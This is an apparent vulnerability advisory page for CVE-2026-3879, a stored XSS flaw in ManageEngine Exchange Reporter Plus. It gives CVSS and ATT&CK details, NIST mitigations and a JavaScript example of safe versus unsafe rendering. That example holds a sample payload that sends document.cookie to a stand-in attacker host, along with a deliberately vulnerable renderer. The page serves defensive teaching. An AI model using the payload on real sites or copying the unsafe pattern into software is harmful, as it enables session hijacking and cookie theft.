CVE-2026-3879
Published: 03 April 2026
Summary
CVE-2026-3879 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Zohocorp Manageengine Exchange Reporter Plus. Its CVSS base score is 7.3 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185). The vulnerability ranks at the 6.5th percentile by exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
Information Input Validation (SI-10) reduces the chance that malicious script reaches the Equipment Mailbox Details report by validating and constraining user-supplied values at the point they are stored. On its own it is not sufficient, because legitimate mailbox names can contain characters such as apostrophes and ampersands that also appear in payloads.
Information Output Filtering (SI-15) prevents execution of stored malicious scripts by context-aware encoding or filtering of values when the vulnerable report is rendered in users' browsers; this is the control that actually closes the stored XSS.
Flaw Remediation (SI-2) ensures timely application of the vendor patch, upgrading to version 5802 or later, which eliminates the stored XSS vulnerability.
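The following is an added illustration of the SI-10 and SI-15 controls described above, not code from Exchange Reporter Plus or from ManageEngine: the mailbox field names, the row template and the sample payload are assumptions constructed for the example, since the product's actual report rendering code is not public. It shows the unsafe string-concatenation pattern behind a stored XSS beside the encoded form, plus an allow-list validator for the write path.

```javascript
// Added example: stored XSS in a report row, vulnerable vs. hardened rendering.
// Field names (displayName, alias), the row template and the payload are
// assumptions for illustration; none of this is the vendor's code.

// Constructed sample of an attacker-controlled value that a low-privileged user
// could store (e.g. a mailbox attribute that later appears in a report).
const storedDisplayName =
  `Conf Room A<img src=x onerror="document.location='//evil.example/?c='+document.cookie">`;

const sampleMailbox = { displayName: storedDisplayName, alias: 'confroom.a' };

// --- Vulnerable pattern: raw concatenation of stored data into HTML -----------
// Whatever was stored is emitted as markup, so the <img onerror> payload runs in
// the browser of every user who opens the report (stored XSS, CWE-79).
function renderRowUnsafe(mailbox) {
  return `<tr><td>${mailbox.displayName}</td>` +
         `<td title="${mailbox.alias}">${mailbox.alias}</td></tr>`;
}

// --- SI-15 Information Output Filtering: encode at render time ---------------
// Encodes the characters that terminate HTML text content or a quoted attribute
// value. Because both quote characters are encoded, the same function is safe
// for text nodes and for double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderRowSafe(mailbox) {
  const name = escapeHtml(mailbox.displayName);
  const alias = escapeHtml(mailbox.alias);
  return `<tr><td>${name}</td><td title="${alias}">${alias}</td></tr>`;
}

// --- SI-10 Information Input Validation: constrain at write time -------------
// Allow-list for a display name: letters, digits, a few punctuation marks,
// bounded length. Angle brackets and control characters are rejected. This is
// defence in depth; the encoding above is what actually prevents execution,
// because names like "O'Brien" or "R&D" are legitimate and must still render.
const DISPLAY_NAME_RE = /^[\p{L}\p{N} .,'&()-]{1,64}$/u;

function validateDisplayName(value) {
  return typeof value === 'string' && DISPLAY_NAME_RE.test(value);
}

// Check used to verify the two renderers: true if the output contains any tag
// start other than the table tags the template itself emits.
function containsInjectedTag(html) {
  return /<(?!\/?t[rd]\b)[a-z]/i.test(html);
}

console.log('unsafe row injects markup:', containsInjectedTag(renderRowUnsafe(sampleMailbox)));
console.log('safe row injects markup:  ', containsInjectedTag(renderRowSafe(sampleMailbox)));
console.log('payload passes validation:', validateDisplayName(storedDisplayName));
```

The order matters: validation rejects the obviously hostile value before it is stored, but because a stored value may have entered through another path (an older version, an import, a directory sync), the report must still encode every field it renders.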
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS enables browser session hijacking (T1185) through script execution in the victim's browser, which directly facilitates theft of web session cookies (T1539) and their reuse for unauthorized actions (T1550.004), matching the confidentiality and integrity impacts described in the deeper analysis below.
NVD Description
Zohocorp ManageEngine Exchange Reporter Plus versions before 5802 are vulnerable to Stored XSS in Equipment Mailbox Details report.
Deeper analysis
CVE-2026-3879 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting Zohocorp ManageEngine Exchange Reporter Plus versions before 5802. The flaw resides in the Equipment Mailbox Details report, where malicious scripts can be persistently injected and stored. Published on 2026-04-03, it carries a CVSS v3.1 base score of 7.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N), reflecting high severity primarily due to impacts on confidentiality and integrity.
Exploitation requires an attacker to possess low privileges (PR:L) and occurs over the network (AV:N) with low attack complexity (AC:L), though it demands user interaction (UI:R) from a targeted user, such as a privileged administrator viewing the report. Successful exploitation allows the injected script to execute in the victim's browser context, enabling high confidentiality (C:H) and integrity (I:H) impacts, such as stealing sensitive data, session tokens, or performing unauthorized actions on behalf of the victim, with no availability disruption (A:N).
ManageEngine has issued an advisory providing further details on the vulnerability at https://www.manageengine.com/products/exchange-reports/advisory/CVE-2026-3879.html. Mitigation centers on upgrading to version 5802 or later, as earlier versions remain vulnerable.
Details
- CWE(s)